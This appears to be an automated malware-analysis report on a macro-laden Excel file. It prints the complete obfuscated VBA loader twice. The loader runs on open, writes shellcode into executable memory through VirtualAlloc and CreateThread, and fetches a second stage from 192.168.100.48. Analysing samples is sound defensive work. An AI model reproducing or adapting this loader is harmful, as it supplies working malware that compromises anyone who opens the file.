Office (OLE) malware analysis — malicious · b53509b8ac150a97

MALICIOUS

Office (OLE)

35.5 KB Created: 2018-06-12 18:45:11 Authoring application: Microsoft Excel First seen: 2019-02-10

MD5: 2ce9781cec2f025011f227c1b48e0e4b SHA-1: 9a6b6a23079e1afdcbb45cf0ebb840a62ac0eed9 SHA-256: b53509b8ac150a97e626255ef30563799eb623677dff85cc0775aaf919f64295

64 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events. The presence of VirtualAlloc and CreateThread API calls suggests the VBA code is designed to allocate memory and execute arbitrary code, likely a downloader for a second-stage payload. The document body 'Plan1' provides no specific lure, but the macro execution is the primary indicator of malicious intent.

Heuristics 5

Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
Auto_Open
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Sub
Sub Workbook_Open()
Auto_Open
```

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

#End If
Sub Auto_Open()
Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4953 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4953 bytes
SHA-256: `fa07f87026f2c2ffa738778795ed950deb6fcb7457f036b8d8b2a2cc64588766`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "EstaPasta_de_trabalho" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Plan1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Módulo1" Const test1 = 2 Const test2 = 1 Const test3 = 0 #If VBA7 Then Private Declare PtrSafe Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As LongPtr, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As LongPtr Private Declare PtrSafe Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As LongPtr Private Declare PtrSafe Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As LongPtr, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As LongPtr #Else Private Declare Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As Long, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As Long Private Declare Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As Long Private Declare Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As Long, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As Long #End If Sub Auto_Open() Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long #If VBA7 Then Dim bnitoxsvwvcs As LongPtr, lrjgvnrkijvhxe As LongPtr #Else Dim bnitoxsvwvcs As Long, lrjgvnrkijvhxe As Long #End If syobpebpitrlzpvfe = Array(232, 130, test3, 0, test3, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, test1, 44, 32, 193, 207, 13, test2, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, test2, 209, 81, 139, 89, 32, test2, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, test2, 214, 49, 255, 172, 193, _ 207, 13, test2, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, test2, 211, 102, 139, 12, 75, 139, 88, 28, test2, 211, 139, 4, 139, test2, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, test3, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _ 83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 185, test2, test3, 0, 232, 199, test3, 0, test3, 47, 101, 112, 90, 116, 54, 75, 112, 78, 72, 86, 107, 69, 56, 81, 88, 119, 88, 57, 69, 88, 115, 65, 119, 54, 78, 84, 72, 116, 105, 72, 66, 51, 90, 77, 78, 108, 68, 106, 50, 97, 117, 65, 121, 52, 66, 106, 105, 119, 69, 88, 104, 115, 105, 79, test3, _ 80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, test3, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, test3, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, test3, 0, 104, 68, 240, 53, 224, 255, _ 213, 79, 117, 205, 232, 75, test3, 0, test3, 106, 64, 104, test3, 16, test3, 0, 104, test3, 0, 64, test3, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, test3, 32, test3, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, test2, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 49, 57, 50, 46, 49, 54, 56, 46, 49, 48, 48, _ 46, 52, 56, test3, 187, 240, 181, 162, 86, 106, test3, 83, 255, 213) bnitoxsvwvcs = lkrhokgstxqrvrdnfu(test3, UBound(syobpebpitrlzpvfe), &H1000, &H40) For jzprwfvbukhau = LBound(syobpebpitrlzpvfe) To UBound(syobpebpitrlzpvfe) lfoveadzop = syobpebpitrlzpvfe(jzprwfvbukhau) lrjgvnrkijvhxe = nqjstddnbfhaobeqkh(bnitoxsvwvcs + jzprwfvbukhau, lfoveadzop, test2) Next jzprwfvbukhau lrjgvnrkijvhxe = tzlmokwh(test3, test3, bnitoxsvwvcs, test3, 0, test3) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Private Function dskaymqvwmki(ByVal kwiqswaezhbd As String) As String Dim bapzlpgynsok As Long For bapzlpgynsok = 1 To Len(kwiqswaezhbd) Step 2 dskaymqvwmki = dskaymqvwmki & Chr$(Val("&H" & Mid$(kwiqswaezhbd, bapzlpgynsok, 2))) Next bapzlpgynsok End Function

SHA-256: fa07f87026f2c2ffa738778795ed950deb6fcb7457f036b8d8b2a2cc64588766

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Plan1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Módulo1"
Const test1 = 2
Const test2 = 1
Const test3 = 0
#If VBA7 Then
Private Declare PtrSafe Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As LongPtr, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As LongPtr
Private Declare PtrSafe Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As LongPtr
Private Declare PtrSafe Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As LongPtr, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As LongPtr
#Else
Private Declare Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As Long, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As Long
Private Declare Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As Long
Private Declare Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As Long, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As Long
#End If
Sub Auto_Open()
Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long
#If VBA7 Then
Dim bnitoxsvwvcs As LongPtr, lrjgvnrkijvhxe As LongPtr
#Else
Dim bnitoxsvwvcs As Long, lrjgvnrkijvhxe As Long
#End If
syobpebpitrlzpvfe = Array(232, 130, test3, 0, test3, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, test1, 44, 32, 193, 207, 13, test2, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, test2, 209, 81, 139, 89, 32, test2, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, test2, 214, 49, 255, 172, 193, _
207, 13, test2, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, test2, 211, 102, 139, 12, 75, 139, 88, 28, test2, 211, 139, 4, 139, test2, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, test3, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _
83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 185, test2, test3, 0, 232, 199, test3, 0, test3, 47, 101, 112, 90, 116, 54, 75, 112, 78, 72, 86, 107, 69, 56, 81, 88, 119, 88, 57, 69, 88, 115, 65, 119, 54, 78, 84, 72, 116, 105, 72, 66, 51, 90, 77, 78, 108, 68, 106, 50, 97, 117, 65, 121, 52, 66, 106, 105, 119, 69, 88, 104, 115, 105, 79, test3, _
80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, test3, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, test3, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, test3, 0, 104, 68, 240, 53, 224, 255, _
213, 79, 117, 205, 232, 75, test3, 0, test3, 106, 64, 104, test3, 16, test3, 0, 104, test3, 0, 64, test3, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, test3, 32, test3, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, test2, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 49, 57, 50, 46, 49, 54, 56, 46, 49, 48, 48, _
46, 52, 56, test3, 187, 240, 181, 162, 86, 106, test3, 83, 255, 213)
bnitoxsvwvcs = lkrhokgstxqrvrdnfu(test3, UBound(syobpebpitrlzpvfe), &H1000, &H40)
For jzprwfvbukhau = LBound(syobpebpitrlzpvfe) To UBound(syobpebpitrlzpvfe)
lfoveadzop = syobpebpitrlzpvfe(jzprwfvbukhau)
lrjgvnrkijvhxe = nqjstddnbfhaobeqkh(bnitoxsvwvcs + jzprwfvbukhau, lfoveadzop, test2)
Next jzprwfvbukhau
lrjgvnrkijvhxe = tzlmokwh(test3, test3, bnitoxsvwvcs, test3, 0, test3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Private Function dskaymqvwmki(ByVal kwiqswaezhbd As String) As String
Dim bapzlpgynsok As Long
For bapzlpgynsok = 1 To Len(kwiqswaezhbd) Step 2
dskaymqvwmki = dskaymqvwmki & Chr$(Val("&H" & Mid$(kwiqswaezhbd, bapzlpgynsok, 2)))
Next bapzlpgynsok
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.